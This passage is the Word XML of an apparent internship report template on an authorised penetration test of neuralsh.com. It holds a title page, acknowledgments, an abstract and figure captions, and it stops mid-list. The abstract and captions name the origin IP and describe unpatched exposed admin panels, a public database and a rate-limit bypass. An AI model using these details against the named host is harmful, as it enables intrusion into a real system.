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jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>INSTITUTION OF TECHNOLOGY OF CAMBODIA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Department of General Studies and Natural Sciences</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="480"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bachelor of Information and Communication Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>INTERNSHIP REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>VULNERABILITY ASSESSMENT AND PENETRATION TESTING (VAPT)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>ON A WEB APPLICATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="480"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>A Case Study of neuralsh.com</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4535"/>
        <w:gridCol w:w="4535"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Student Name:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>[Your Full Name]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Student ID:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>[Your Student ID]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Academic Supervisor:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>[Supervisor Name]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Company Supervisor:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Prestige Alliance Co., Ltd.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Submission Date:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>June 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>ACKNOWLEDGMENT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>I would like to express my sincere gratitude to the President of the Institution of Technology of Cambodia, the Head of the Department of General Studies and Natural Sciences, and my academic supervisor for their continuous guidance and support throughout this internship programme.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>I am deeply grateful to the management and technical team at Prestige Alliance Co., Ltd. for providing the opportunity to conduct this vulnerability assessment and penetration testing engagement on neuralsh.com, and for their professional guidance during the internship period.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>I also extend my appreciation to all colleagues and peers who provided feedback during the preparation of this report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Khmer OS" w:hAnsi="Khmer OS"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>មូលដ្ឋានទេច</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Khmer OS" w:hAnsi="Khmer OS"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[បញ្ចូលសរុបខ្លឹមសារជាភាសាខ្មែររបស់អ្នកនៅទីនេះ។ ចម្លងអត្ថបទខ្មែររបស់អ្នកហើយជំនួសអត្ថបទក្នុងតង្កៀបនេះ។]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>ABSTRACT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This report presents a comprehensive Vulnerability Assessment and Penetration Testing (VAPT) engagement conducted on neuralsh.com, an AI-powered neural search platform, as part of an internship at Prestige Alliance Co., Ltd. The assessment was authorized in writing prior to testing, and all activities were conducted in accordance with the OWASP Testing Guide and established ethical hacking standards.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>A black-box methodology was applied, simulating an external attacker with no prior knowledge of the target system. The engagement followed the complete penetration testing lifecycle: reconnaissance, scanning, enumeration, exploitation, post-exploitation, and reporting. Twenty (twenty) distinct vulnerabilities were discovered: four Critical, five High, seven Medium, and four Low severity findings. Critical findings include a publicly exposed MySQL database, a MikroTik network router administration panel, a cPanel hosting control panel, and a WHM root server administration panel — all accessible from the public internet without IP restriction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>A rate-limiting control was successfully bypassed via HTTP header spoofing, enabling unlimited API token generation. A follow-up verification scan conducted on ten June 2026 confirmed all original findings remained unpatched and identified three additional findings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Keywords: Penetration Testing, VAPT, Web Application Security, OWASP, Rate Limiting Bypass, JWT Analysis, cPanel Exposure, MikroTik, Black Box Testing, CVSS v3.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>TABLE OF CONTENTS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="808080"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[Right-click here and select "Update Field" to generate Table of Contents]</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>LIST OF FIGURES</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4535"/>
        <w:gridCol w:w="4535"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Figure 4.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SSH connection to Kali Linux VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Figure 4.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Tool version verification — Nmap, Nikto, Metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Figure 4.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>neuralsh.com homepage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Figure 4.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>WHOIS lookup for neuralsh.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Figure 4.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>DNS enumeration — MX and TXT records (SPF, DMARC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Figure 4.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Wildcard DNS — randomxyz123.neuralsh.com resolving to origin IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Figure 4.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SSL certificate mismatch on origin server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Figure 4.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Nmap full port scan of 103.16.62.217 — twenty-three open ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Figure 4.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>cPanel and WHM login pages publicly accessible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Figure 4.11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>MikroTik RouterOS WebFig accessibility confirmation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Figure 4.12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Nikto web scanner results</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Figure 4.13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Nuclei scan — zero matches</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Figure 4.14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
